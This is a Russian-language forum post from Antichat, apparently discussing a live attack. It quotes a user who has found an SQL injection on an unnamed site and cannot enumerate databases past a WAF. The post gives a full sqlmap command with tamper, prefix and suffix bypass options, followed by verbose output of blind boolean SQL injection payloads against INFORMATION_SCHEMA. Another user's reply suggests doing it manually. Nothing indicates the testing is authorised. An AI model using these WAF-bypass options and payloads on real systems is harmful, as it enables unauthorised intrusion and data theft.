03.11.2018, 16:12
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от msk_smail
↑
Добрый день! Раскрутил SQL но WAF не дает список получить, пробовал no-cast и hex с тамперами - ничего не помогает , подскажите как быть ?
Код:
--fresh-queries --tamper=unionalltounion --prefix="111'/*!40222" --suffix="*/!'" --no-cast -v 3 --level=5 --risk=3 -p id --batch --dbs
Код:
back-end DBMS: MySQL unknown
[09:35:14] [INFO] fetching database names
[09:35:14] [INFO] fetching number of databases
[09:35:14] [PAYLOAD] 1'"
[09:35:14] [WARNING] reflective value(s) found and filtering out
[09:35:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51)*9950*/!'
[09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48)*9950*/!'
[09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9)*9950*/!'
[09:35:14] [INFO] retrieved:
[09:35:14] [DEBUG] performed 3 queries in 0.23 seconds
[09:35:14] [ERROR] unable to retrieve the number of databases
[09:35:14] [INFO] falling back to current database
[09:35:14] [INFO] fetching current database
[09:35:14] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>64)*1021*/!'
[09:35:15] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>32)*1021*/!'
[09:35:15] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>1)*1021*/!'
[09:35:15] [INFO] retrieved:
[09:35:15] [DEBUG] performed 3 queries in 0.22 seconds
[09:35:15] [CRITICAL] unable to retrieve the database names
Может есть смысл руками ?
|
|
|